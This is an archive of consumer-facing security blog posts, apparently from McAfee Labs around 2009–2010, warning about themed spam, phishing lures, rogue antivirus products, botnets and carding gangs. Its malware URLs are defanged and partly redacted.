Never is the heartless nature of cybercriminals more apparent than in the wake of a tragedy. As relief efforts continue and worldwide aid pours in to help those affected by the earthquake that rocked Haiti on January 12, cybercriminals have not slowed their efforts. They are eager to get you to donate money that the people of Haiti will never see. Spoofing legitimate relief organizations such as the Red Cross is a typical social engineering lure used by the bad guys to take your money. This morning, however, a particular scam caught my eye that I wanted to share with you. Its subject line was “Help for Haiti” and was sent by “b.obama@whitehouse.gov.” Mr. “b.obama” writes:

I’ve censored some of the contact information so that nobody visiting this blog will attempt to send money to the people responsible for this scam. I cannot emphasize enough that you must perform due diligence before donating to any charity. Ensure that the money you donate is going to the cause that you choose.

A couple of things to remember:

• Don’t respond to emails requesting donations, credit card information, or other sensitive information that you do not feel comfortable giving
• Don’t click links within email that direct to donation websites, as they may be directing you to a malicious website under the covers
• Don’t open attachments with donation forms, as they may be executable malware
• Work directly with charity organizations that you know and trust

Cybercriminals prey on the emotions of their victims. That’s why social engineering tactics such as these are successful. However, if you do your homework first, follow safe email and web-browsing habits, and work closely only with reputable charities to donate money, you can feel more comfortable that your sensitive information won’t end up in the wrong hands.

Angelina Jolie and Barack Obama are the #1 celeb subjects of choice for spammers, according to our January Spam Report. The report also reveals:

• The top 25 men and women that were spammed
• Chinese pharma spam isn’t going away – in fact, on Dec 14, spam levels skyrocketed with subject lines advertising discounts on Pfizer drugs
• “Free-hosting” websites to provide spam URLs has become a major target for spammers

Be mindful of those celebrity names that appear in your inbox! Download the full report here.

With the New Year just days away, it’s time for McAfee Labs 2010 Threat Predictions. What should you be wary of in the coming year? Social networks.

Sites such as Twitter and Facebook have changed the way we communicate, interact, and share on the web. As user bases for the top online social destinations reach record highs, cybercriminals are building out their criminal toolkits, taking advantage of new technologies, third-party applications, and hotspots of activity to exploit users.

What does this mean for the average surfer? Next time you receive an invite from one of your “Facebook friends” to play a game that looks like it’s shaping up to be the next Farmville, think twice before you click. In 2010, users are going to be more vulnerable to attacks that blindly distribute fake apps across their networks. The same goes for bit.ly’s and TinyURLs. As abbreviated URLs become more ubiquitous, it will be even easier for cybercriminals to mask and direct users to malicious sites.

Speaking of ubiquity: McAfee Labs predicts that Adobe will overtake Microsoft as the No. 1 target for cybercriminals in 2010. Adobe products—in particular Acrobat Reader and Flash—have become two of the most widely used apps in the world, and cybercriminals go where the masses go. Cybercriminals will have a field day preying on people using Adobe software.

McAfee also believes the following will play a critical role in 2010:

• Banking Trojans will become even more sophisticated. They showed some firepower in 2009—easily getting around current protections used by banks—but next year they will reach a new level with the ability to interrupt legitimate transactions and make unauthorized withdrawals, while flying under the radar.
• Malware via email attachments will increase, especially targeting corporations, journalists, and individuals
• Botnets, the infrastructure that launches nearly every type of cyberattack, will adopt a peer-to-peer architecture, connecting computer to computer without a centralized control point—making it more difficult for cybersecurity professionals to detect them
• HTML 5 and the evolution of the programming language will give cybercriminals new opportunities to write malware and prey on users

Countering these trends, in 2010 McAfee predicts a good year for law enforcement and the ability to identify, track, and combat cybercrime worldwide. After a decade of cybersecurity research, coordination, and training undertaken by agencies across the globe, the community will reap the benefits of the effort put forth over the past ten years.

McAfee Labs serves up the details on its threat predictions in the full report. Surf the web cautiously in 2010!

(We must correct one oversight: Our colleague Pedro Bueno was one of the authors of the report. His name was inadvertantly left off the document. Thanks, Pedro!)

I ran into a few strange IMs over the weekend. When I was not shoveling out my driveway from the 15 inches of snow that covered it I was logged into Facebook telling people about it…. It was then that I started receiving some VERY interesting IMs from a friend extolling the virtues of a clean colon (yep – you read that right):

This lead to the following questionable site, which had some very interesting comments on our SiteAdvisor site:

In short order I also received two more IMs. The first was a video (sound familiar???):

Which lead to a pretty darn good fake Facebook login page (note the SiteAdvisor warning on that page!):

The address this page was hosted on also had a VERY malicious reputation rating from our TrustedSource technology:

Last but not least I got one that included sales pricing for Christmas!!! It is the holidays and scammers certainly like using seasonal trends:

This lead to a really well done “replicas” site with brands such as Rolex, Tiffany, Breitling and others:

I contacted my friend (who was certainly NOT the sending IMs knowingly) and got them fixed up pretty quickly. Not surprisingly it was a Koobface variant on the local machine they were logging into Facebook from.

Facebook is one of the greatest and most popular sites on the Internet today. It has a huge user base, and as such is heavily targeted by scammers and malware writers. Make sure the computer you are accessing it from has up-to-date and properly configured security software!

The United States is still a safe haven for spammers. With U.S. anti-spam legislation doing very little to thwart spammers and the McColo takedown having only a short-term effect, we have found that due to low-cost and reliable hosting and anonymous domain registration, our country remains the world’s top source for spam.

The December report also reveals:

• “Twitter job” spam, which has been going on for months, is on the rise. It’s a scam that tries to get people to create Twitter accounts and send spam to their followers for money.
• This season’s Christmas-themed malware is focused on the recession, advertising fake luxury goods and brands that are “on sale” through email
• One year after the McColo ISP shutdown, spam has risen beyond the levels before McColo was taken offline
• January 1, 2010, marks the sixth anniversary of the CAN-SPAM Act of 2003, but spam levels have reached record levels in the six years since the legislation passed

Read the report in its entirety here.

We recently alerted our readers to spam campaigns using the H1N1 vaccination program to prompt recipients to open the mail. And we have frequently mentioned that crooks love to take advantage of news, disasters, and other events.

Now that the final draw for the FIFA World Cup in South Africa next year has taken place, it is time to remind you that sports events are no exception to the rule. I’ve already found some examples.

The first is a fake lottery. In this case, the source claims the recipient has won a large sum of money from the South African Football Association. After contacting the lottery manager, the victim of the scam will be asked to pay “processing fees” or “transfer charges” so that the winnings can be distributed. Don’t expect to ever see a payment.

The second example is a “watch live games online” offer. Can you guess it’s a fake? The victims pay to download an HD video player, but they receive only a rogue security product (a.k.a. scareware).

When a sport makes the headlines, there are always fans who want to take part. We’ve also encountered fake club offers that are dedicated solely to collecting subscriptions.

As June 2010 approaches we’re certain these scam offers will increase in number and in professionalism. You must be especially vigilant if you plan to buy tickets online for the South Africa games. Go to fifa.com, use a reputable travel agent, or contact your football/soccer association directly. Don’t assume unsolicited online offers are genuine.

In September, The Times of London wrote that New Scotland Yard had tracked down and closed more than 100 sites so far, with as many as 20 based in Britain. These fraudsters were only the pioneers of an Internet crimewave that will rise as the World Cup approaches.

Here is a screenshot I took today on the official FIFA website. (Prices for the various categories are in US dollars.) The site explains that only one location–fifa.com–will sell tickets and that only a few other companies will sell authorized packages.

Compare the real thing with this suspicious site I also found today. It offers different prices for the same categories:

Don’t be disappointed before your team starts to play. Shop carefully if you plan to buy tickets!

We have just released “Mapping the Mal Web,” our third report revealing the riskiest and safest web domains to surf and search.

For the first time combining data from McAfee’s SiteAdvisor and TrustedSource, the report is even more comprehensive than last year’s, naming Cameroon (.cm) as the riskiest place to surf with a whopping 36.7 percent of the domains posing a security risk.

For those domains for which we had 2,000 or more download tests, we measured the percentage of those tests that were risky. Romania (.ro, 21.0 percent), China (.cn, 18.6 percent), and the generic .info (15.2 percent) were found to be most risky, leading by the fourth place finisher, .biz, by a wide margin (6.8 percent).

This report also shows how much the Registrars can achieve when they try. Last year Hong Kong (.hk) was the most risky domain to surf. After taking appropiate actions, their efforts paid off: With just 1.1 percent this year, they have dropped to 34th place. Congratulations to everyone involved!!

That’s enough numbers for now. Get the full report here or find a summary over here.

The report is available in several other languages from the McAfee home page, and to help you avoid risky sites I strongly recommend our free SiteAdvisor.

On December 1st McAfee Labs detected an outbreak of a spam mail pretending to be from the CDC and using the H1N1 virus to facilitate the distribution of a Zeus Trojan executable. The email claims that the CDC is requiring all people to fill out a “vaccination profile” online.

This email has been associated with the following subjects, but there are likely to be more as the campaign progresses:

Governmental registration program on the H1N1 vaccination
State Vaccination H1N1 Program
Your personal Vaccination Profile
Create your personal Vaccination Profile
State Vaccination Program
Creation of personal Vaccination Profile
Instructions on creation of your personal Vaccination Profile
Creation of your personal Vaccination Profile

These emails contain a url that points to a website which urges the victim to download a vaccination profile archive:

The link is an executable that installs a VERY recent Zeus trojan variant. Zeus is an easy-to-use tool for constructing trojans and has been associated with numerous botnets. As of the time of this writing, McAfee is among only a handful of AV engines that detects this strain (7/41 engines detected it according to VirusTotal, and McAfee had 2 of those 7 engines).

The domains in the email were registered or updated a week before the campaign began. The whois information associated with the domains indicate that most of them were registered with a Belgium registrar at active24.be.

The DNS servers that are authoritative for the spam domains were purchased from a Chinese registrar “Xin Net Technologies”, but the DNS servers themselves are being hosted from locations in the US, Japan and Hong Kong. We even see some of the dns servers being used as previously having been associated with sending spam mail for the Cutwail botnet, which has been known to use the Zeus Trojan. This could indicate the possibility that some the dns servers themselves may simply be infected hosts.

These hostnames are associated with 135 distinct IP addresses associated with the websites hosting the Trojan, which stem from all over the world and appear to be dsl accounts.

The primary countries hosting the websites at the time of this writing are in Colombia, Brazil, India, Malaysia, Chile and Argentina.

Stay updated and stay safe!!

National unemployment rates over 10% and the pressures of the holiday shopping season make for a dangerous cocktail that the cyber criminals can take advantage of.  Fears of not being able to pay the monthly mortgage, car payments, backed up bills, and providing for your children for the holidays have put many people into situations that they never thought they would find themselves in. This has caused many to become desperate and vulnerable as the try to make ends meet.  Cyber criminals are always looking to take advantage of vulnerable situations as a way to dupe people into giving up your sensitive information.  In addition to obviously being criminals, I always say that cyber criminals are also great marketers!

To that point, be on the lookout for many different types of scams this holiday season (check out our recently published “12 Scams of Christmas“) including get rich quick schemes and work from home opportunities that are really just covers for phishing scams or attempts to inject malware onto your computer.

We are monitoring a couple such scams arriving via email which are linking off to Twitter updates or free blogging services like Google’s Blogspot:

As the holiday season progresses, we will see more of these types of scams popping up with themes ranging from holiday sales and rebate opportunities to holiday e-cards which actually install malicious applications instead of the holiday card!.  One bit of advice that we ask users to follow is that if you are interested in the latest deals and bargains being offered by your favorite online retailer this holiday season, go to the web site directly by typing their web site into your browser.  Do not click on a link in an email or instant message to get you there because the link might actually be masked to go to a lookalike site setup by cyber criminals to steal your personal information.  If the offer that arrived in your inbox is legitimate it will be honored on the web site if you browse there manually as opposed to clicking a link that arrived in your inbox.

Have a safe and malware free holiday season!

It is the time of year to get together with family and friends, and that often involves flying. So, how about a promotional airline ticket for just $1?

That sounds like an irresistable idea! Though it also sounds too good to be true. As you can imagine, there is something wrong here. Instead of flying for a buck, you may end up with several fewer hundred dollars in your bank account.

This example is the most recent seasonal spam targeting Brazilians. In the image below you can see the pitch.

When you click on the image, which is hosted at hxxp://dhroot.hpg.com.br/images/danosse.jpg, you’ll follow a link that will attempt to download a Trojan from hxxp://www.medcitybuilders.com/plugins/system/[REMOVED]/. This Trojan is a downloader that will copy a password-stealing malware that targets the customers of Brazilian banks. The malware is currently hosted at hxxp://www.radfahrschule.at/html/modules/PagEd/browsepics/[REMOVED].

In Brazil we say “there is no such thing as free dinner.” In the States there’s no free lunch. In this case we can also see that there are no free air tickets.

One year ago today email administrators were astonished to notice the amount of spam hitting their mail servers had plunged precipitously. Email volumes dropped off as much as 60 percent to 70 percent, and the reason wasn’t immediately obvious to anyone except for the folks who knew that McColo, a major spam-hosting ISP had been taken offline. Three of the largest spam-sending botnets at the time–Rustock, Srizbi, and Mega-D–had command and control machines hosted at McColo and were drastically affected. Mega-D’s volume dropped by more than 95 percent and Srizbi volumes dropped by more than 80 percent.

However, only days after McColo was taken offline, it was reconnected for a brief period–about 12 hours–by its uplink provider, giving just enough time for the Rustock botnet owners to recommunicate with their infected machines and point the command and control centers to other service providers. Rustock quickly regained its status as a top spam distributor. The Mega-D botnet owners also bounced back until it was shut down just this past week. Srizbi, which once accounted for more than 50 percent of spam volume, never recovered and is no longer a factor in today’s spam wars.

What has happened since McColo was shut down? Did spam volumes ever recover from the loss of three of the largest spam-sending botnets? Not only did spam volumes recover, unfortunately, but they recovered quickly and have greatly surpassed the volumes that we saw before McColo was taken offline.

You can see in the preceding graph where volumes stood and how they dropped off after McColo was cut off. However, the shutdown’s effect was brief and ultimately small. We have seen dramatic increases since then due to the relaunching of botnets such as Rustock as well as new botnets such as Bredo (which primarily sends fake nondelivery notifications spoofing package delivery services like FedEx, DHL, and UPS) and Waledac (the rebirth of the Storm botnet). Spam volumes have more than doubled since just February 2009, dwarfing several times over the decreases due to McColo’s demise.

The McColo closure as a single event remains significant, but when you compare it with the huge increases in volumes that we have seen since then–because of increased spoofs against social media sites through viruses like Koobface and spam continuing to be major factors in the successes of Rustock and Cutwail–the decrease now reflect only a momentary blip on the radar. 

Nonetheless, you should expect to see more of these types of takedowns as security researchers and research organizations continue to get involved, but you should also expect the overall effect of those shutdowns to be temporary. McColo has taught botnet owners a lesson. As a result botnet control centers have become more distributed, spanning many networks in many countries. Today taking down a big hosting provider would prove only a minor inconvenience as opposed to a major victory for security forces.

How good are you at identifying a genuine security product from an imposter that claims to offer protection? If you think you are good at it, then have a look at the images below.

[ Legitimate McAfee site]

[Rogue Anti-Virus MaCatte site]

Recently we have seen the rapid growth of rogue anti-virus/spyware programs. This one is especially interesting. Why? Because it mimics McAfee’s security product. This rogue software displays the same user interface as McAfee Security Center. It also offers a web page that looks similar to McAfee’s legitimate site.

I suppose we should be flattered that malware authors have chosen our product as one worth imitating. Rogue anti-virus products have long mimicked Microsoft’s security apps in Windows XP (FakeAlert-XPSecCenter) and Windows Vista/Windows 7 (FakeAlert-EA).

The idea behind fake AV software is to trick unsuspecting users into thinking their machines are infected. The malware will display a window that shows many innocent files detected arbitrarily as compromised. These fake security alerts are baseless–they exist to trick victims into pressing the panic button. In this case agreeing to “Remove all threats now” will lead to purchasing the MaCatte Antivirus 2009 product. The rogue software offers several “features”:

[MaCatte SecurityCenter image]

And that’s not all–MaCatte Antivirus 2009 will block currently installed or downloaded anti-virus software. It will redirect your browser to various misleading websites, including the rogue program’s homepage, www.macatte.com.

Once installed, MaCatte Antivirus will start automatically when you boot Windows. Then it will scan your computer and display numerous infections, but will not remove them until you first purchase the program.

The cost of cleaning the “malicious” files comes at the rip-off price of $99. Leading legitimate anti-virus security products don’t come close to the cost of this imposter. I hope that’s an eye opener for you. Don’t become a victim.

Update: McAfee’s legal team contacted the domain registrars, who swiftly brought down the site to spare unsuspecting surfers from becoming victims to this imposter. Detection is available beginning with the 5793 DATs as FakeAlert-MaCatte.

Warning to all Pacquaio and Cotto fans. Bad guys are taking advantage of their upcoming fight. Searching for “Pacquiao vs Cotto” could lead to fake anti-virus programs.

Similar to the scam described at Arun Pradeep’s blog post. Once the search result is clicked, users are redirected to a website showing a fake online malware scanning and warns users that their systems are infected. It would then ask to install an anti-virus program to remove the malware.

This fake online scanning is seen hosted at the following domains:

• secure-pcprotection.net
• examinedicho.com

This malware is now detected as FakeAlert-AB. Always update your security product and be extra careful when accessing unknown sites.

It didn’t take long for spammers to change from Halloween lures to spam and malware. They’ve already moved to the Christmas season, and we have started to see emails from the Cutwail botnet that are using a Christmas theme to trick users into visiting malicious websites. Spammers must be trying to beat retailers to the advertising punch this year.

The campaign we are currently monitoring uses subject lines that try to get users to visit websites selling fake jewelry and Rolexes. These spammers aren’t cheap either. Only the best will do for their customers–brands such as Cartier, Gucci, and Tag Heuer are on “sale” to all who would be fooled.

They even went so far as to include a logo to the Better Business Bureau and a “Hacker Safe” image on their site. Ironic, isn’t it?

This and similar sites are part of a campaign to steal your credit card information and identity. With the holiday shopping season rushing toward us, be sure to exercise extreme diligence regarding businesses you give your sensitive information to. The tricks that criminals use during the holiday season will be difficult to discern from legitimate marketing.

How can you stay safe? Avoid clicking links in emails. If you want to visit your favorite retail site to check out their holiday specials, type the address directly into the address bar. Most legitimate sites will not force you to click a link within an email to take advantage of their latest deals.

We have already discussed the Facebook phishing campaign. Now the scammers are using the phishing campaign not just for spamming but also for a “cocktail” attack.

• The scammers have targeted Facebook, telling them that the Facebook account passwords have been changed.
• The malware downloads a keylogger to collect credit card numbers, social security number, and other passwords from the victims’ machines.
• The malware pushes a fake security product, which disables many applications, such as Notepad, Wordpad, etc., until the bad guys are paid.

This phishing campaign attempts to convince users that the email comes from Facebook by forging the From: address.

The mail claims the password has been changed and that it is available in the attached zip file. Once the victims unzip it, they see a file with a spreadsheet icon. When the victim tries to open the file to look for a password, it drops the payload and deletes itself. Once the malware is installed, it establishes a connection to the attacker’s server through the HTTP port and attempts to download more payloads onto the infected machine.

The malware also downloads a keylogger and runs it covertly. The second attack hunts for any keystroke so that it can collect information such as the login ID password, credit card and socialsSecurity numbers, etc. The malware sends the data to a remote server through a backdoor it creates. But this is not yet the end of the game.

While this data theft occurs, the malware also tries to download a fake security product. The rogue application that enters through the backdoor will be covertly installed on the victim’s machine. Once installed, the fake product runs a service that kills almost all open applications: Notepad, Calculator, Registry Editor, Task Manager, and others. (It does not kill Internet Explorer because it needs IE to to communicate with the malware server.) After killing these apps, the malware shows a fake alert–claiming the application you’re trying to open is being used to connect to a malware server. (See image below.)

Phishing campaigns on social networking sites are not new. Scammers are not satisfied only pushing spam to sell “Canadian” pills. Now they also want to sell fake security products, and they need all of our passwords. With McAfee coverage, you’ll be protected against this cocktail attack.

I have previously blogged that some of the most common techniques scammers and cybercriminals use are news events and holidays. Balloon Boy and the Windows 7 Launch are good examples. My colleague Sam Masiello’s blog on President Barack Obama’s Nobel Prize is another excellent example. With Halloween approaching rapidly, the tricks are already knocking on your inbox and at your browser’s window.

As usual, although the lure differs depending upon the news or event, these tricks lead to the usual suspects–fake products and pharmacy spam. Just think of it: Would you like some candy or Viagra for Halloween?

Here’s another:

And our favorite with a holiday spin:

Here are a few message subjects to fear:

Approved meds available without recipe!
A HORRIFYING HALLOWEEN SALE!
ONLY TILL 31OCTOBER HALLOWEEN SALE: 40% OFF ALL OUR SOFT USE THIS DISCOUNT CODE: HALL-6666
Biggest deal this halloween
Low prices for big enlargement
Halloween discount
Annual Halloween Sale

While searching for “Halloween screensavers,” I ran across more than a few questionable websites. The following was the fifth entry on the first Google results page! No worries, we already had it flagged through our SiteAdvisor technology:

Keep your security updated and search safely this week!

I’m writing this blog to demonstrate how the bad guys are getting better each day–or not, depending of your point of view.

Once again our topic is Brazilian malware authors. Yes, the dumb ones I keep running up against.

One of the recent versions of the PWS-Banker Trojan being distributed via spam has an interesting feature. First, let’s recall how those malwares usually spread:

This version of PWS-Banker, besides grabbing passwords and screenshots, will also download Microsoft MSN Messenger. Or an app that at least looks like Messenger.

When you enter your username and password and click enter, the app will exit. But, in the background it will message all your contacts on your behalf, sending nice notes with links.

Now, let’s play The Seven Errors Game. Below are two MSN Messenger login screens. (One is in Portuguese and the other is in English, but that is not one of the errors.)

and

Unfortunately I am not really being fair with you, because only one of the seven errors can be seen visually. The other six are found only by behavioral analysis.

Here are the answers, starting from the top and working downward.

1) The windows are different, and you can see the minimize/maximize/close buttons are different
2) The help icon is the same, but when you click on it, no option is clickable
3) The dropbox on the login name doesn’t work
4) The status drop box doesn’t work
5,6,7) The check boxes don’t work

Next time something unexpected pops up on your screen, don’t enter your data right away. Check and recheck before you believe it’s real.

It’s bad enough that we are subjected to apparently fake child-peril balloon shenanigans in the news–and I guess this was only to be expected–but it seems that spammers and scammers have latched onto Balloon Boy as a lure to sell pharmaceuticals. Given the amount of news the original story of Falcon Heene and the runaway balloon produced and the subsequent news around the possible scam, it was too attractive a lure to be ignored.

As usual, though, despite the novelty of the news event itself, the spams lead to the same types of stuff:

All leading to the same fake “Canadian” pharmacy sites. (The Chinese registrant info for this one was only a few days old!):

Common subjects to beware of include:

Little boy trapped in balloon
Boy-balloon-madness
balloon kid’s full story
Balloon boy died
Little boy trapped in balloon
Balloon boy died
balloon kid’s full story
Boy-balloon-madness
Drama with balloon(exclusive)

Be careful what you click, and mind the news. It is often the lure the spammers look for.

My thanks to colleagues Adam Wosotowsky and Sam Masiello for the samples.

The release of Microsoft’s next major operating system, Windows 7, is at hand. It’s timely to remind everyone that we have seen Windows 7 spam for a few months. Anything on this scale from Microsoft is too big a lure for spammers and cybercriminals to ignore. (I would be stunned if they didn’t take advantage.)

We’ve seen subjects that include:

Microsoft Windows 7 special offers
Windows 7 SP 2
Windows 7 FAQ on release
Today’s Special Gateway Laptop + NEW Windows 7 & More Electronics Deals
Windows7 ultimate 86% off
Windows7 ultimate 57% off

We at McAfee Labs have noticed these throughout both September and October–with spikes as high as 1.88 percent of total spam. That might sound like a small number, but when you consider that daily spam volumes can reach 160 billion messages, it is not insignificant.

As always, stay aware of the trends the scams and spammers use to lure you in. Be safe and watch what you click!

I thank my colleague Adam Wosotowsky for the background data!

We had earlier blogged about spammers abusing different social networking websites and taking full advantage to host their spam on them. Recently researchers at McAfee Labs came across a new spam campaign in which yet another big social networking website, YouTube, is being abused.

As we know, YouTube is a video sharing website on which users can upload and share videos. During a recent spam campaign, we saw that Russian spammers had created a spam video and are hosting it on YouTube. This new spam trend, hosting spam videos, could possibly alarm other regional spammers and as a result we may see spam videos in other languages including English, Chinese, and German, etc.

Some of the subjects lines read as:-

Subject: ВАША РЕКЛАМА МОЖEТ БЫТЬ ЗДЕСЬ

Subject: Служба e-mail раccылок

Translated to English:-

Subject: Your advertisement can be here

Subject:  Service for e-mail distribution

The mail body is short, with a link to YouTube. Users who might have clicked on the URL would have watched a small video of approximately 36 seconds in which two guys converse in Russian, At the end of the video the spammer inserts information like telephone and ICQ numbers to reach them.

Translated to English:-

Widespread distribution – http://www.youtube.com/watch?Text has been removed

The text on the video was somewhat like this:

Массовые рассылки реклама в интернет.  [This text in Russian was seen as a heading for sequence 2]

Translated to English:-

Mass mailing advertisement on the Internet.

Here are other recent spam details:

1) Russian spam mails are seen with obfuscated phone and ICQ numbers at the end of the mail

2) The opt-out option is missing in Russian mails

3) The mail is generally short with a single URL

4) Russian words in the mail body are also obfuscated

5) The mail body text is multicolored

6) Typical spammed categories for Russian mails include adult, lease, educational, and service/product promo

Finally, don’t click any URLs or links in a suspicious email, and most importantly stay up to date with software patches.

In Las Vegas during this month’s McAfee FOCUS 09 conference, I listened to various speakers in the Threats and Trends track. They explained how cybercrime was now managed by individuals driving their groups according to highly professional business models.

One of the most interesting talks was made by my colleague Dirk Kolberg, who presented on Innovative Marketing, a Ukrainian scareware company the Federal Trade Commission accused of spreading some massive “scareware” schemes–alarming messages falsely claimed that scans had detected viruses, spyware, and illegal pornography on consumers’ computers. The U.S. District Court for the District of Maryland approved the FTC’s request to call a halt to the company’s activities and freeze the assets of those behind the scams.

Explaining that Innovative has more than 600 employees in real offices, subsidiaries in various countries such as India, Poland, Canada, United States, and Argentina and complete with customer-calling centers, Dirk said the company received approximately 4.5 million order IDs in 11 months or, in other words, US$180 million dollars (at $40 each). Technical support, a professional website, and LinkedIn profiles for the company and its staff provided what appears to be a legitimate front. Following its legal troubles, it is now a defunct company; yet many employees have joined a new entity that has the same production targets.

The same day, my colleague Dmitri Alperovitch gave an overview of the Eastern European countries’ cybercrime landscape. Like Dirk, Dmitri demonstrated the high level of organization within the cybercrime industry. The first example came from Romania, where the Bogdan Païu carding gang operated. Members were caught in the act and arrested in 2006 after they emptied the accounts of several hundred citizens of Brazil, Spain, Italy, and the United States.

Well organized and equipped with sophisticated cloning devices, they received the personal data from Russian accomplices. Counterfeiters used the money diverted from ATMs on striptease entertainment clubs, luxury cars, luxury hotel accommodation, food, and fine drinks.

In the second part of his talk, Dmitri presented an events timeline of the Eastern European carding underground:

He discussed CarderPlanet, and its hierarchical structure set up like a mafia (and the source for the following image: NICSA-FBI-SSA, Michael J. McKeown )

CarderPlanet was shut down in 2004 and the FTC complaint for the injunction against IMU dates from December 2008, but cybercrime gangs will always rise from their ashes.

Around Kyiv, the making of fake antivirus software still flourishes. The latest statistics on rogue antivirus–presented by Craig Schmugar and Anthony Bettini in their session–are unequivocal.

The last piece of news on carding and phishing demonstrates the size and the worldwide organization of the actual cybercrime gangs.

• In France, about 70 individuals were recently indicted. They were “mules” who, via Western Union, sent the money they embezzled to the Ukraine and Russia.
• In France, a gang of Slovakian gangsters from Britain was under investigation after bank cards were used to take more than $480,000 from cash machines in northern France. Up to 50 Eastern Europeans descended on Calais from Dover early on September 11 before emptying cash points across the region. 34 were arrested, all using Barclays Bank cards. According to the police in Lille, a “Mafia-style” mastermind had used dozens of mules to empty machines at a range of banks.
• This month in the United States, the FBI announced the results of the Operation Phish Phry. After a two-year investigation, more than 50 individuals in California, Nevada, and North Carolina and nearly 50 Egyptian citizens have been charged with crimes including computer fraud, conspiracy to commit bank fraud, money laundering, and aggravated identify theft. The gang victimized hundreds and possibly thousands of account holders by stealing their financial information and using it to transfer about $1.5 million to bogus accounts they controlled. Here, too, the group was very organized, as demonstrated by a chart created with i2 Analyst’s Notebook by Gary Warner.

All these examples support the position that Dave DeWalt discussed during Wednesday’s general session: “The bad guys are getting organized. This is not the hacker in your basement. We’re talking about organized crime, organized terrorism, and organized warfare,” DeWalt said. Identity theft, phishing, or fake alerts go through the Net. Faced with these threats, large organizations deploy solutions from multiple vendors because the truth is that no single vendor can meet all of their security and compliance needs. But today’s security threats and economic challenges demand that products from multiple vendors interoperate to provide better protection, reduce operational costs, and streamline the compliance lifecycle. This is why at FOCUS 09 DeWalt also reaffirmed his support of the McAfee Security Innovation Alliance (SIA). He described it as the “NATO” of security software, a call for a universal architecture for security standards and confirmed that McAfee is focused on improving partnerships and establishing an extended broader community through this innovative technology-partnering program.

Spammers are always looking for techniques that can beat the spam filters. We have seen various techniques for spamming–like obfuscating words, embedding text in images, spoofing urls, abusing social networking sites, and many other techniques for spam to avoid getting caught.

One of these techniques is ASCII art, an artful way of representing an image using text characters. These representations first appeared long ago to overcome the limitations of computers for displaying graphics.

Example:

______    _____   ______    _       _____    _____     ___
| ___ \  |  ___|  | ___ \  | |     |_   _|  /  __ \   / _ \
| |_/ /  | |__    | |_/ /  | |       | |    | /  \/  / /_\ \
|    /   |  __|   |  __/   | |       | |    | |      |  _  |
| |\ \   | |___   | |      | |____  _| |_   | \__/\  | | | |
\_| \_|  \____/   \_|      \_____/  \___/    \____/  \_| |_/

The clever thing is that each line has some random characters with _ and | characters, which do not resemble any part of the word replica. If we take the entire picture into consideration, though, our eyes can read it as a word. The spammers try to take advantage of this to pass through spam filters and deliver their intended message.

Not only are the words represented in this manner but even URLs can be displayed in this way to avoid the blacklisting of the domains.

ASCII art spam is not limited to only nonword characters. It can be numbers, alphabets, and combinations of both, which can make things even worse for certain spam filters:

dP""b8  88     db     88     88  dP"Y8
dP      88    dPYb    88     88 `bo
Yb      88   dP__Yb   88     88   `Y8b
 YboodP 88  dP""""Yb  88ood8 88  8bodP'

In the email above we can see that the spammer is advertising a pharmacy product without using the respective words, yet still successfully conveys the message.

We saw this spam technique some time back, but it had died off. Recently, however, we have seen an increase. McAfee customers are protected from this type of spamming technique.

Just when I thought we weren’t going to see any spam campaigns related to the recent announcement of United States President Barack Obama being awarded the Nobel Peace Prize, I was proven wrong. Spammers rarely disappoint when a juicy news story hits. It’s like attracting flies to honey.

This spam campaign calls into question whether Obama deserved to win the prize and that the country is suffering significant fallout as a result. The email then requests that users click or copy/paste a link into their browsers that will direct them to a website where they can download more information.

If users click on the link, they are brought to a site where they see an image of Obama followed by a notification that their download will start shortly. Remember users believe that they are going to be downloading a report on the unrest created by Obama’s acceptance of the award.

Five seconds after the page loads, users are prompted to download the file Obama_NobelPrize.exe. That is not the end of the story, however. Because users might not want to download an executable file, there is an extra bit of fun embedded within this page. Located at the bottom of the page is a little snippet of encoded JavaScript that looks like this:

Decoding this JavaScript reveals that this page also attempts to silently load an iframe hosted on the tokyopharmm.com domain. The iframe attempts to load a series of PDF exploits to inject a password-stealing Trojan onto the user’s PC. We currently identifiy this Trojan as Generic PWS.y!hv.i.

This is another example in which current news stories are used to lure users into downloading malware. It’s a popular tactic that is repeated over and over, but it continues to work due to its obvious successes. Even if you think you are going to outwit the malware authors by visiting their website but not download files, the page could be executing JavaScript in the background. Those scripts open other pages/sites via invisible iframes and test your machine for zero-day vulnerabilities and exploit them.

Surrounded by a network of neon lights across the ceiling, walls of computer screens lit with grave headlines regarding our country’s digital dependence–drinking water, sewer systems, banks, government systems, all vulnerable to an electrical grid outage–I introduced my wife and my sixteen-year-old daughter to our latest McAfee endeavor, an exhibit contributor in the new International Spy Museum exhibit “Weapons of Mass Disruption.”

Yes, you read that correctly. Your humble narrator is part of a museum exhibit.

Nestled on the corner of 8th and F Streets in Washington, D.C., the International Spy Museum has become a must-see in our nation’s capital. It speaks to our country’s tales of espionage and the ultimate currency, intelligence. Never has a place been better suited to educate its visitors about the cybersecurity threats facing our government, our businesses, and you and me.

As former national intelligence director Admiral Michael McConnell mentioned during the exhibit’s opening event, the Internet has created an unprecedented level of vulnerability.

These threats, which could bowl you over in their magnitude and frequency, are constantly evolving, morphing into ever-changing but equally lethal pieces of malware–as diverse and fluid as Web 2.0 itself. In that stuff is our office, littered with Red Bull and Twinkies, where I and many other McAfee Labs researchers garner an understanding of the dark side of cyberspace activity. You know the saying: Keep your friends close but your enemies closer. It is this insight that yields information on breaking threats and a more holistic understanding of the black-hatted enemy.

So consider again the computer wall’s grave headlines in the exhibit: “The Pentagon’s IT system is probed 360 million times a day. Twitter crashed as a result of a denial of service attack against a Georgian proponent. Is our air traffic control system protected?”

The exhibit shouts the theme that we as an industry live and that I shared during my contribution interview. The threat is real. Even my daughter got a kick out of it.

Cybercriminals are taking advantage of American concerns about healthcare by flooding the Internet with spam. According to our October Spam Report, 70 percent of global spam is now “Canadian” pharmacy spam, which takes advantage of fears of swine flu and the rising costs of Medicare and pharmaceuticals.

Spammers generate more than 150 billion spam messages daily; that’s enough to send everyone in the world more than 30 emails every day (including people without computers). Nearly 19 out of every 20 emails are spam, and cybercriminals are growing more sophisticated with their attacks. No brands seem to be safe, and this month’s report analyzes how spammers are abusing the brands of Monopoly, The Hollywood Reporter, and even the Jewish organization Chabad to distribute malware.

The report can be downloaded here.

I am excited to be involved in the joint industry effort of defining an XML format which will allow for the rapid exchange of information between security companies. This work was done by the “Malware Working Group” operating as part of the “Industry Connections Security Group” (ICSG) and under the umbrella of the IEEE. If you Google for “IEEE” and “ICSG” you should have the link at the top of the list – IEEE ICSG .

